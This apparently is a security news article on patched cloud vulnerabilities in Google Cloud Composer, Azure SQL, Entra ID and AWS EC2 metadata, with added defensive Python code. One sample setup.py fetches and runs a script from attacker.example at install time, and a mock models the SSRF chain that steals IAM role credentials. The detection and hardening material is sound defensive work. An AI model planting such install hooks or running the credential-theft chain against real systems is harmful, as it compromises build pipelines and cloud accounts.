Google, Microsoft, AWS Patch Major Cloud Security Bugs


Cybersecurity researchers have exposed a series of cloud-related vulnerabilities that could have allowed attackers to escalate privileges, manipulate configurations, and compromise sensitive data across major platforms including Google Cloud Platform (GCP), Microsoft Azure, and Amazon Web Services (AWS). These now-patched flaws illustrate the growing complexity and interconnected risk within modern cloud infrastructures.

One significant vulnerability, dubbed ConfusedComposer, was discovered in Google Cloud’s Cloud Composer service by researchers at Tenable. Cloud Composer, built on Apache Airflow, lets users orchestrate complex workflows. According to Liv Matan, senior security researcher at Tenable, attackers with only edit permissions could have escalated access to the Cloud Build service account, which carries elevated privileges across multiple GCP services such as Cloud Build, Cloud Storage, and the Artifact Registry.

Privilege Escalation via Malicious PyPI Packages

Tenable found that Cloud Composer lets users install custom PyPI packages into an environment, and that those installations ran inside Cloud Build under the default Cloud Build service account. Because pip executes a package's setup.py when it builds a source distribution, an attacker able to add a package during an environment update could have that install script run arbitrary code in Cloud Build's context, inheriting the elevated access described above. The vulnerability is a variant of an earlier flaw known as ConfusedFunction, and follows another recent GCP issue, ImageRunner, which targeted Cloud Run to compromise container image integrity.
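The passage above turns on one fact: a source package's setup.py is ordinary Python that the installer runs. The following is an added example, not Tenable's or Google's code, showing a static scan that flags the two ways such a package executes code at install time: module-level calls (which run as soon as pip builds metadata) and a cmdclass override of install-time commands. The two setup.py samples are constructed for this demo; the host name attacker.example and the paths in them are placeholders.

```python
"""Static scan of a PyPI sdist's setup.py for install-time code execution.

Added example (not Tenable's or Google's code). pip executes setup.py as a
script when building a source distribution, so module-level statements and
overridden setuptools command classes run with the installer's privileges.
"""
import ast

# Calls that mean "run something" anywhere in setup.py. Build metadata should
# never need these; their presence is a strong signal, not proof, of abuse.
EXEC_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output", "urllib.request.urlopen",
    "exec", "eval",
}
# setuptools commands that pip (or a developer) triggers during installation.
HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}


def _dotted(node):
    """Dotted name for a Name/Attribute call target (e.g. 'os.system'), else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return [(lineno, reason), ...] for a setup.py source string."""
    tree = ast.parse(source)
    findings = []

    # 1. Any execution-style call in the file, whether at module level
    #    (runs on import) or inside a command class (runs on that command).
    for stmt in tree.body:
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call) and _dotted(node.func) in EXEC_CALLS:
                findings.append((node.lineno, f"execution call {_dotted(node.func)}"))

    # 2. setup(cmdclass={...}) replacing an install-time command.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted(node.func) == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in HOOKED_COMMANDS:
                            findings.append((key.lineno, f"cmdclass overrides '{key.value}'"))
    return findings


def is_suspicious(source):
    """True if the scan produced any finding."""
    return bool(scan_setup_py(source))


# Constructed sample: a package whose setup.py runs code at install time.
MALICIOUS_SETUP = '''\
import os
import subprocess
from setuptools import setup
from setuptools.command.install import install

# runs as soon as pip imports this file to build metadata
subprocess.run(["curl", "-s", "http://attacker.example/p.sh", "-o", "/tmp/p.sh"])

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("sh /tmp/p.sh")   # runs inside the installer's context

setup(name="totally-benign", version="1.0", cmdclass={"install": PostInstall})
'''

# Constructed sample: a plain declarative setup.py.
CLEAN_SETUP = '''\
from setuptools import setup
setup(name="benign", version="1.0", packages=["benign"])
'''

if __name__ == "__main__":
    for lineno, reason in scan_setup_py(MALICIOUS_SETUP):
        print(f"line {lineno}: {reason}")
```

A scan like this belongs in the review step before a package is added to a Composer environment, alongside pinning versions and preferring wheels, which do not run setup.py at all. It will not catch code hidden behind obfuscation or a pyproject.toml build backend, so the identity-side fix Google shipped (a least-privilege service account for the install) remains the control that matters.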

“ConfusedComposer is significant because it reveals how hidden interactions between cloud services can lead to privilege escalation,” Matan explained. All it took was a user with permission to update a Cloud Composer environment to compromise high-privilege components.

If exploited, attackers could steal data, inject malicious code into CI/CD pipelines, or create persistent backdoors in cloud environments. Google patched the vulnerability on April 13, 2025, switching Cloud Composer’s behavior to use the environment’s own service account for PyPI installations, instead of the more powerful default Cloud Build account.

Google noted that Cloud Composer 2 environments created with version 2.10.2 and later, and all Cloud Composer 3 environments, already follow the updated security model. Older Composer 2 setups were migrated to use the safer configuration.

Microsoft Azure SQL and Entra ID Bugs Also Addressed

Around the same time, Varonis Threat Labs disclosed a critical flaw in Microsoft Azure involving Azure SQL Server. Known as the Destructive Stored URL Parameter Injection vulnerability, it allowed a privileged attacker to manipulate server firewall rule names via Transact-SQL (T-SQL).

By inserting specific characters into a rule name, a threat actor could store logic that later triggers destructive actions, such as deleting arbitrary Azure resources, once an administrator interacts with the stored configuration. Researcher Coby Abrams warned that this issue could lead to large-scale data loss if successfully exploited. Microsoft resolved the flaw on April 9, 2025, after being notified on August 5, 2024.

In another case involving Microsoft Entra ID, formerly Azure Active Directory, Datadog Security Labs discovered a vulnerability within restricted administrative units. These units are intended to scope administrator control, but the flaw enabled a privileged user to lock down an account so thoroughly that even Global Administrators couldn’t delete, modify, or reset it.

Researcher Katie Knowles explained that attackers could protect accounts under their control by blocking key admin actions such as password resets, session revocation, and MFA clearance. Microsoft patched the issue on February 22, 2025, after receiving the report in August 2024.

AWS EC2 Metadata Targeted via SSRF

Meanwhile, threat actors are actively exploiting Server-Side Request Forgery (SSRF) vulnerabilities in AWS EC2 instances to access instance metadata. According to F5 Labs researcher Merlyn Albery-Speyer, attackers leverage SSRF flaws to extract sensitive data without authenticating or making external API calls.

The EC2 Instance Metadata Service (IMDS) exposes instance details such as IP addresses and instance IDs and, most valuable to an attacker, the temporary credentials of the IAM role attached to the instance. With those credentials an attacker can act as the instance's role, pivot into other AWS services, or escalate privileges within the account. The original IMDSv1 answers plain GET requests, which is exactly what a typical SSRF bug lets an attacker send; IMDSv2 requires a session token first obtained with a PUT request carrying a TTL header, so enforcing IMDSv2 (HttpTokens=required) on instances shuts down this GET-only attack path.
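The following added example (not F5 Labs' or AWS's code) models the exchange above in-process: a mock IMDS that can run in IMDSv1 or IMDSv2-required mode, a GET-only fetcher standing in for the SSRF bug, the two-request chain an attacker sends through it, and the PUT-then-GET flow a legitimate client uses once IMDSv2 is required. The paths and header names are the real IMDS ones; the host, role name, token and credential values are constructed for this demo.

```python
"""IMDSv1 vs IMDSv2 against a GET-only SSRF, as an in-process model.

Added example, not F5 Labs' or AWS's code. MockIMDS reproduces the relevant
endpoint behaviour; the role name, session token and credentials are fake.
"""
import ipaddress
from urllib.parse import urlparse

IMDS_HOST = "169.254.169.254"
METADATA_ADDRS = {"169.254.169.254", "fd00:ec2::254"}   # IPv4 and IPv6 IMDS endpoints
TOKEN_PATH = "/latest/api/token"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
TOKEN_HDR = "X-aws-ec2-metadata-token"
TTL_HDR = "X-aws-ec2-metadata-token-ttl-seconds"

# Constructed, non-functional credential document.
FAKE_CREDS = '{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"fake","Token":"fake"}'


class MockIMDS:
    """Minimal IMDS model. require_v2=True mirrors HttpTokens=required."""

    def __init__(self, require_v2, role="app-role"):
        self.require_v2 = require_v2
        self.role = role
        self._token = "AQAAAexampletoken"   # constructed session token

    def request(self, method, path, headers=None):
        headers = headers or {}
        if method == "PUT" and path == TOKEN_PATH:
            # v2 token issuance: the TTL header is mandatory.
            return (200, self._token) if TTL_HDR in headers else (400, "")
        if method != "GET":
            return 405, ""
        if self.require_v2 and headers.get(TOKEN_HDR) != self._token:
            return 401, ""            # v1-style GET is refused
        if path == CREDS_PATH:
            return 200, self.role     # lists the attached role name
        if path == CREDS_PATH + self.role:
            return 200, FAKE_CREDS    # temporary credentials for that role
        return 404, ""


def vulnerable_fetch(imds, url):
    """The SSRF primitive: GET an attacker-chosen URL with no extra headers."""
    u = urlparse(url)
    if u.hostname != IMDS_HOST:
        return 502, ""                # this model only answers for the IMDS host
    return imds.request("GET", u.path)


def steal_role_creds(imds):
    """Two-step chain an attacker drives through the GET-only SSRF."""
    status, role = vulnerable_fetch(imds, f"http://{IMDS_HOST}{CREDS_PATH}")
    if status != 200:
        return None
    status, creds = vulnerable_fetch(imds, f"http://{IMDS_HOST}{CREDS_PATH}{role}")
    return creds if status == 200 else None


def legitimate_v2_client(imds):
    """How software on the instance obtains credentials under IMDSv2."""
    status, token = imds.request("PUT", TOKEN_PATH, {TTL_HDR: "21600"})
    if status != 200:
        return None
    _, role = imds.request("GET", CREDS_PATH, {TOKEN_HDR: token})
    status, creds = imds.request("GET", CREDS_PATH + role, {TOKEN_HDR: token})
    return creds if status == 200 else None


def hardened_fetch(imds, url):
    """Application-side layer: refuse metadata/link-local targets before fetching.

    A real fetcher must also resolve hostnames and re-check the resolved
    address, or DNS rebinding bypasses this literal-address check.
    """
    u = urlparse(url)
    host = u.hostname or ""
    try:
        if host in METADATA_ADDRS or ipaddress.ip_address(host).is_link_local:
            return 403, "blocked: metadata endpoint"
    except ValueError:
        pass                          # not an IP literal; see docstring
    return vulnerable_fetch(imds, url)


if __name__ == "__main__":
    print("IMDSv1:", steal_role_creds(MockIMDS(require_v2=False)))
    print("IMDSv2:", steal_role_creds(MockIMDS(require_v2=True)))
```

The enforcing control lives on the instance, not in the application: `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required` switches an existing instance to IMDSv2-only, and the same setting belongs in launch templates so new instances start that way.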

These revelations underscore the inherently interconnected nature of cloud services, where minor misconfigurations or design choices can lead to significant breaches if exploited. Cloud providers like Google, Microsoft, and Amazon are continually updating their security models in response, but researchers stress the importance of rigorous testing, least-privilege access, and transparent patching timelines to safeguard critical infrastructure.
